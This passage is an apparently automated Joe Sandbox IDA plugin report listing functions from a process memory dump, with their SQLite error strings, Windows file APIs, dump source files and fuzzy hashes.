Instruction ID: 7f9775f645df46c225da88f99929e9a88b1c7e257f24854ce5647b632e255b61
Opcode Fuzzy Hash: 17d4b881cd4b23427a867eb69d1372982fe730547eb5eb4cc2b6ec9f5c1ed7fa
Instruction Fuzzy Hash: 6601D176204210AFE310DA4DEC80F52B7E9EB88324F01056DFA4CD7280E772FC418762

Function 1D73EF30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D73EFB0
%s at line %d of [%.10s], xrefs: 1D73EFB5
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D73EFA6

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 56f601f95593217d646cdfff00d50402469b696bf033af5b0fc9f13e3034d575
Instruction ID: 06840bc3726072c347bed08ce3bba877ddb7cec7b178f90cee35db06be59f7be
Opcode Fuzzy Hash: 56f601f95593217d646cdfff00d50402469b696bf033af5b0fc9f13e3034d575
Instruction Fuzzy Hash: DA01DEB0A0A622EBD700CF08DC84B5A3BB1AFC2356F094669E5486F342D375E845CF93

Function 1D7A9180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

%s_stat, xrefs: 1D7A9192

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s_stat
API String ID: 0-920702477
Opcode ID: 6a8a9b809ffd38554ba62bd4277e312addbaeeb12f95632edb60c0ac609adc2c
Instruction ID: 18e9bb9798b2e4fc635c6ca2aa4965d57ad5fcc910895c3fb69a2570672c1b48
Opcode Fuzzy Hash: 6a8a9b809ffd38554ba62bd4277e312addbaeeb12f95632edb60c0ac609adc2c
Instruction Fuzzy Hash: 46F09722A082527BE70042B9FC88B46EBC5AB44031F494626E50C92120C312BCA183D2

Function 1D757F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 1D757F76

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
API String ID: 0-3072645960
Opcode ID: 52374d21fef6ab1cf4b54e17361db7dcfb14d41c68a49126ebdce5eecd2b83ad
Instruction ID: 594018f0bcb4f8af70b6c4c79736c85387352581bde11b0fb54e688b3d09db58
Opcode Fuzzy Hash: 52374d21fef6ab1cf4b54e17361db7dcfb14d41c68a49126ebdce5eecd2b83ad
Instruction Fuzzy Hash: F0F0F63A64834296DB109F19FC05B89B790AFD0332F16012AF94896290E760A88683A3

Function 1D7700B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D7700EA
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7700DB
database corruption, xrefs: 1D7700E5

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 786ff46137dee0294a1110e05e3cef3cee410bb9749e44faed95656bda73021f
Instruction ID: 33e93b1903d8400ef0677795ed6b38bcf90648ce99f3381786db2b8e1e51e93c
Opcode Fuzzy Hash: 786ff46137dee0294a1110e05e3cef3cee410bb9749e44faed95656bda73021f
Instruction Fuzzy Hash: 8AE0E568740155ABDB05D924CD85FB377A16B40720F864896E415DB253E760E890D763

Function 1D836B50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

Strings

cannot open file, xrefs: 1D836B59
%s at line %d of [%.10s], xrefs: 1D836B5E
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D836B50

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1799306995
Opcode ID: 9ebdddb8c16f79bdbe999efb8f246a9373a6a79fbeb3aa5bb327317c64b544ff
Instruction ID: 1596ef129ad2c71025b82d84450a61dfab4a06bcb54afb747d68128d952517fc
Opcode Fuzzy Hash: 9ebdddb8c16f79bdbe999efb8f246a9373a6a79fbeb3aa5bb327317c64b544ff
Instruction Fuzzy Hash: 65B0929A504290B6DB40BD58DC41FE72D1167D0715F8688FEB29D792A7F096D0908213

Function 1D83A570 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D83A57E
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D83A570
database corruption, xrefs: 1D83A579

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 5e5efcadfcb71d3cbd94cbda28a83ff8c284aad84818ffd055767d40ac72403a
Instruction ID: de57b7dc7be51fff0c5f686d8ea91c4c9f17764f9e70cafb771fd50a85b4bb92
Opcode Fuzzy Hash: 5e5efcadfcb71d3cbd94cbda28a83ff8c284aad84818ffd055767d40ac72403a
Instruction Fuzzy Hash: F0B092AD504210B2DB00B958DD02FE73D105BD0745F8288BEB25D6A2A3F22594108253

Function 1D86C1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D86C1F9
%s at line %d of [%.10s], xrefs: 1D86C1FE
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D86C1F0

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: f7146e52665e83879b6ae1957187d68239e61854d721e36d00d412b499464a4e
Instruction ID: 13da0b04628a80c824bcfea5b0abe8a7a6c4e48cf88a6277ddd2e228fe7f5549
Opcode Fuzzy Hash: f7146e52665e83879b6ae1957187d68239e61854d721e36d00d412b499464a4e
Instruction Fuzzy Hash: FBB092AD514A58F6DB00A948DC81EEA69116BD031BF8280BEB6A9AD2A7F06590106213

Function 1D7925E0 Relevance: 6.4, APIs: 4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67c02bd86316d69d21778004ae7eae71b5685ba7c219aaaded33d145555d2578
Instruction ID: bafce25b632b91614ca045868da4e71080c2067b14690bd314f085a5d99a2e4c
Opcode Fuzzy Hash: 67c02bd86316d69d21778004ae7eae71b5685ba7c219aaaded33d145555d2578
Instruction Fuzzy Hash: 57D1A172A082119BD704EF25E8C8B2A77B8FF452B5F40062AF905D7211EB39E554CFA3

Function 1D9267F5 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 1D926858
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 1D926AAA
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1D926AF0
GetLastError.KERNEL32 ref: 1D926B93

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: e95633e8daa075ca40c0c8a6868f857b1394fc1a0a0cc8bedd0cf5ee015c64e1
Instruction ID: cae74976942dba6f4891bee77404b12c988502fa3d323eb6acc8729e84b97b74
Opcode Fuzzy Hash: e95633e8daa075ca40c0c8a6868f857b1394fc1a0a0cc8bedd0cf5ee015c64e1
Instruction Fuzzy Hash: DCD18875D09258AFCB06CFE8C880AEDBBB8FF09310F14816EE516EB655D630A901CF91

Function 1D7D8EB0 Relevance: 6.2, APIs: 4, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0da661e6de83288d497302257255787b81ba9148b9c6ccc592db9186878f442a
Instruction ID: 36f8b25af19fa55090443c2729911f4c4b081772ea0b40a3520d3833dc3bd815
Opcode Fuzzy Hash: 0da661e6de83288d497302257255787b81ba9148b9c6ccc592db9186878f442a
Instruction Fuzzy Hash: E45149356087835ED7518F75A8497AAFFE59F01330F0946AAE9C8CB242E369D588C363

Function 1D757DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5a27926bda2cb2567e3f7f1f63ef3a09ce722769f08a76342fa548822d8017
Instruction ID: 8551149d6f64f42c9f88df81b5cadc514515cca59c4309b5905b5f51c6a0c04b
Opcode Fuzzy Hash: 0f5a27926bda2cb2567e3f7f1f63ef3a09ce722769f08a76342fa548822d8017
Instruction Fuzzy Hash: EC41BE766007019FD714CF18E980A62F7E1FF84334F15856EEA4687A62D772F862CB92

Function 1D75CAE0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9910df2373fd2db390fb74b71e9a257a06816967b4ee83915849b198fbc91485
Instruction ID: 47314f135b8dd66b2cbeec0beab65ea63e6216bf0efa7ce833dab71428c20b17
Opcode Fuzzy Hash: 9910df2373fd2db390fb74b71e9a257a06816967b4ee83915849b198fbc91485
Instruction Fuzzy Hash: 5A3172B6A043419BDB14DF68E844B66B3E4FF84322F040A7FE949C7661E321E954D7A3

Function 1D75B1F0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction ID: 1ec3d582bc7e4b6327576fab199a34a922dcf72fa4b9de2e0295f308b7c98307
Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction Fuzzy Hash: 9E31A175508B419FD320CB25E8447BAB7E0BF85334F04892ED8AA82911D771F488CBA3

Function 1D7CCFE0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
Instruction ID: 3a26027cdec77510f7639ebe9017dffa39cd1a01eec7c12e6f06406baf37bc7c
Opcode Fuzzy Hash: 67f155ee4936aae19aec06cb809ffc92085dd37a0bce870209c165f40ac7d322
Instruction Fuzzy Hash: A121B6755047069FD750EF6CD884A5ABBF0EF94350F90482DF585C3222E731E5588B92

Function 1D92F4CA Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 1D92F4E0
GetLastError.KERNEL32(?,?,?,?), ref: 1D92F4ED
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 1D92F513
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 1D92F539

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 4fa621a5acb3869c5dcd3ec986f9a0a95653d6ce99f2efc1e43eb0eaac12dd61
Instruction ID: 091eef1715f6376e090faa065f319a99a81d6ecb2f1d4aa92a07392cbc860659
